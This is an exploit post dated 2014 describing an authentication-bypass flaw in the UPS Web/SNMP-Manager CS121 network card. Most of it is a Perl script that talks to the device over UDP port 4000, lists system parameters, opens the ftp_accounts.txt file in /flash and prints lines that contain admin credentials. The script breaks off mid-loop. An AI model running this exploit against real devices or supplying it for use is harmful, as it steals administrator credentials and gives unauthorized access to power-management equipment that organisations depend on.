UPS Web/SNMP-Manager CS121 – Authentication Bypass

  • 作者: jkmac
    日期: 2014-05-15
  • 类别:
  • 来源:
  • source:
    UPS Web/SNMP-Manager CS121 is prone to an authentication-bypass vulnerability.
    Attackers can exploit this issue to bypass authentication mechanism and gain access to the HTTP(s), SNMP or Telnet port service. 
    #!/usr/bin/perl -w
    use IO::Socket;
    use constant MAXBYTES => scalar 1024;
    $socket = IO::Socket::INET->new( PeerPort=> 4000,
     PeerAddr=> $ARGV[0],
     Type=> SOCK_DGRAM,
     Proto => 'udp');
    $socket->recv($inline, MAXBYTES);
    print "UPS: $inline \n"; 
    $socket->send("show syspar");
    $socket->recv($inline, MAXBYTES);
    print "$inline\n";
    print "Searching login\n" ; 
    $socket->recv($inline, MAXBYTES);
    $socket->send("cd /flash");
    $socket->send("type ftp_accounts.txt"); 
    while($socket->recv($inline, MAXBYTES)) { 
    	 if($inline =~ /admin/ig) { print $inline; exit;}